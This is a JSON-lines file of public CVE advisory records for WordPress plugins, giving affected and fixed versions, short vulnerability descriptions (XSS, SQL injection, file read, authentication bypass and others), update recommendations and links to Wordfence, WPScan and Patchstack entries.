{"CVE_ID":"CVE-2023-0096","slug":"happyforms","versionEndExcluding":"1.22.0","description":"The Happyforms WordPress plugin before 1.22.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28150e7-214b-4bcd-85c0-e819c4223484\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28150e7-214b-4bcd-85c0-e819c4223484\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7295","slug":"video-grid","versionImpact":"1.21","versionEndExcluding":"1.22","description":"The Video Grid plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5247ad-dbbf-4d8e-92f5-3a673b97d080?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5247ad-dbbf-4d8e-92f5-3a673b97d080?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824307%40video-grid%2Ftags%2F1.21&new=2900422%40video-grid%2Ftags%2F1.22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824307%40video-grid%2Ftags%2F1.21&new=2900422%40video-grid%2Ftags%2F1.22\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11418","slug":"additional-order-filters-for-woocommerce","versionImpact":"1.21","versionEndExcluding":"1.22","description":"The Additional Order Filters for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shipping_method_filter' parameter in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195214%40additional-order-filters-for-woocommerce&new=3195214%40additional-order-filters-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195214%40additional-order-filters-for-woocommerce&new=3195214%40additional-order-filters-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59ea96f-ad02-4189-8155-7de7de5556ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59ea96f-ad02-4189-8155-7de7de5556ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10583","slug":"popup-maker","versionImpact":"1.20.2","versionEndExcluding":"1.20.3","description":"The Popup Maker \u2013 Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018post_title\u2019 parameter in all versions up to, and including, 1.20.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.20.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197898%40popup-maker&new=3197898%40popup-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197898%40popup-maker&new=3197898%40popup-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b4dc917-0d59-4163-a613-49afc1dc4d33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b4dc917-0d59-4163-a613-49afc1dc4d33?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50849","slug":"e2pdf","versionEndExcluding":"1.20.24","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in E2Pdf.Com E2Pdf \u2013 Export To Pdf Tool for WordPress. This issue affects E2Pdf \u2013 Export To Pdf Tool for WordPress: from n\/a through 1.20.23.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-23-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-23-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5229","slug":"e2pdf","versionEndExcluding":"1.20.20","description":"The E2Pdf WordPress plugin before 1.20.20 does not sanitize and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 1.20.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb6ce636-9e0d-4c5c-bb95-dde1d2581245\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb6ce636-9e0d-4c5c-bb95-dde1d2581245\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9219","slug":"share-button","versionImpact":"1.19","versionEndExcluding":"1.20","description":"The WordPress Social Share Buttons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19aa8ca-0ce8-4a9a-8f71-7d7e67e8f99b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19aa8ca-0ce8-4a9a-8f71-7d7e67e8f99b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/1.19\\\/share-button\\\/trunk\\\/admin\\\/page_editor.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/1.19\\\/share-button\\\/trunk\\\/admin\\\/page_editor.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-button\\\/tags\\\/1.19\\\/admin\\\/page_editor.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-button\\\/tags\\\/1.19\\\/admin\\\/page_editor.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171315\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3295","slug":"wp-editor","versionImpact":"1.2.9.1","versionEndExcluding":"1.2.9.2","description":"The WP Editor plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.2.9.1. This makes it possible for authenticated attackers, with Administrator-level access and above, to read arbitrary files on the affected site's server which may reveal sensitive information.","recommendation":"Update to version 1.2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4618c1f4-c0aa-47f5-8c0b-2cb4a021f2e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4618c1f4-c0aa-47f5-8c0b-2cb4a021f2e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3294","slug":"wp-editor","versionImpact":"1.2.9.1","versionEndExcluding":"1.2.9.2","description":"The WP Editor plugin for WordPress is vulnerable to arbitrary file update due to missing file path validation in all versions up to, and including, 1.2.9.1. This makes it possible for authenticated attackers, with Administrator-level access and above, to overwrite arbitrary files on the affected site's server which may make remote code execution possible assuming the files can be written to by the web server.","recommendation":"Update to version 1.2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9298820e-3753-41b3-8ba6-9fb494e215a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9298820e-3753-41b3-8ba6-9fb494e215a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2446","slug":"wp-editor","versionImpact":"1.2.9","versionEndExcluding":"1.2.9.1","description":"The WP Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'current_theme_root' parameter in versions up to, and including, 1.2.9. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.","recommendation":"Update to version 1.2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3555702-4427-4569-8fd6-f84113593e9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3555702-4427-4569-8fd6-f84113593e9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151053\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151053\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2232","slug":"realteo","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The Realteo - Real Estate Plugin by Purethemes plugin for WordPress, used by the Findeo Theme, is vulnerable to authentication bypass in all versions up to, and including, 1.2.8. This is due to insufficient role restrictions in the 'do_register_user' function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.purethemes.net\\\/findeo\\\/knowledge-base\\\/changelog-findeo\\\/\",\"name\":\"https:\\\/\\\/docs.purethemes.net\\\/findeo\\\/knowledge-base\\\/changelog-findeo\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9888","slug":"elementinvader-addons-for-elementor","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's contact form widget redirect URL in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba9d12c5-fe3a-4958-8d35-c63bb05b6d5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba9d12c5-fe3a-4958-8d35-c63bb05b6d5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168782\\\/elementinvader-addons-for-elementor\\\/trunk\\\/modules\\\/forms\\\/ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168782\\\/elementinvader-addons-for-elementor\\\/trunk\\\/modules\\\/forms\\\/ajax-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10110","slug":"tinychat-roomspy","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"A vulnerability classified as problematic was found in ruddernation TinyChat Room Spy Plugin up to 1.2.8 on WordPress. This vulnerability affects the function wp_show_room_spy of the file room-spy.php. The manipulation of the argument room leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.9 is able to address this issue. The name of the patch is ab72627a963d61fb3bc31018e3855b08dc94a979. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230392.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230392\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230392\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230392\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230392\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/tinychat-roomspy\\\/commit\\\/ab72627a963d61fb3bc31018e3855b08dc94a979\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/tinychat-roomspy\\\/commit\\\/ab72627a963d61fb3bc31018e3855b08dc94a979\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2503","slug":"wd-facebook-feed","versionEndExcluding":"1.2.9","description":"The 10Web Social Post Feed WordPress plugin before 1.2.9 does not sanitise and escape some parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b1caf1-d00b-4075-b71a-0516d5604286\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b1caf1-d00b-4075-b71a-0516d5604286\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5235","slug":"ovic-vc-addon","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The Ovic Responsive WPBakery WordPress plugin before 1.2.9 does not limit which options can be updated via some of its AJAX actions, which may allow attackers with a subscriber+ account to update blog options, such as 'users_can_register' and 'default_role'. It also unserializes user input in the process, which may lead to Object Injection attacks.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35c9a954-37fc-4818-a71f-34aaaa0fa3db\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35c9a954-37fc-4818-a71f-34aaaa0fa3db\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12432","slug":"wpc-shop-as-customer","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208130%40wpc-shop-as-customer&new=3208130%40wpc-shop-as-customer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208130%40wpc-shop-as-customer&new=3208130%40wpc-shop-as-customer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048625e8-10b7-418d-a13b-329f1d7e0171?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048625e8-10b7-418d-a13b-329f1d7e0171?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13572","slug":"precious-metals-chart-and-widgets","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The Precious Metals Charts and Widgets for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nfusion-widget' shortcode in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227123%40precious-metals-chart-and-widgets&new=3227123%40precious-metals-chart-and-widgets&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227123%40precious-metals-chart-and-widgets&new=3227123%40precious-metals-chart-and-widgets&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f2c8c5f-2017-4b22-a864-dc142b3b1afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f2c8c5f-2017-4b22-a864-dc142b3b1afb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2130","slug":"cww-companion","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The CWW Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Module2 widget in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10532","slug":"bard-extra","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Bard Extra plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bardxtra_import_xml() function in all versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to import demo data.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bard-extra\\\/trunk\\\/bard-extra.php#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bard-extra\\\/trunk\\\/bard-extra.php#L341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad5d2b2-fca8-46bb-8a03-02be07f2a800?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad5d2b2-fca8-46bb-8a03-02be07f2a800?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11106","slug":"simple-restrict","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.7 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198971\\\/simple-restrict\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198971\\\/simple-restrict\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb50bc9-5ad7-402e-a624-90f3302e1b0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb50bc9-5ad7-402e-a624-90f3302e1b0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4469","slug":"profile-extra-fields","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Profile Extra Fields by BestWebSoft plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the prflxtrflds_export_file function in versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to expose potentially sensitive user data, including data entered into custom fields.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916c73e8-a150-4b35-8773-ea0ec29f7fd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916c73e8-a150-4b35-8773-ea0ec29f7fd1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975179\\\/profile-extra-fields\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975179\\\/profile-extra-fields\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0503","slug":"99fy-core","versionEndExcluding":"1.2.8","description":"The Free WooCommerce Theme 99fy Extension WordPress plugin before 1.2.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cb148fb-1f30-4316-a421-10da51d849f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cb148fb-1f30-4316-a421-10da51d849f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0443","slug":"anywhere-elementor","versionEndExcluding":"1.2.8","description":"The AnyWhere Elementor WordPress plugin before 1.2.8 discloses a Freemius Secret Key which could be used by an attacker to purchase the pro subscription using test credit card numbers without actually paying the amount. Such key has been revoked.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/471f3226-8f90-43d1-b826-f11ef4bbd602\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/471f3226-8f90-43d1-b826-f11ef4bbd602\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2294","slug":"backuply","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.7 via the backup_name parameter in the backuply_download_backup function. This makes it possible for attackers to have an account with only activate_plugins capability to access arbitrary files on the server, which can contain sensitive information. This only impacts sites hosted on Windows servers.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/main\\\/ajax.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/main\\\/ajax.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1615\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1615\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10795","slug":"popularis-extra","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Popularis Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.7 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5de554-1d2f-4932-9f93-1333b07edeba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5de554-1d2f-4932-9f93-1333b07edeba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185542%40popularis-extra&new=3185542%40popularis-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185542%40popularis-extra&new=3185542%40popularis-extra&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8046","slug":"injection-guard","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Injection Guard WordPress plugin before 1.2.8 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
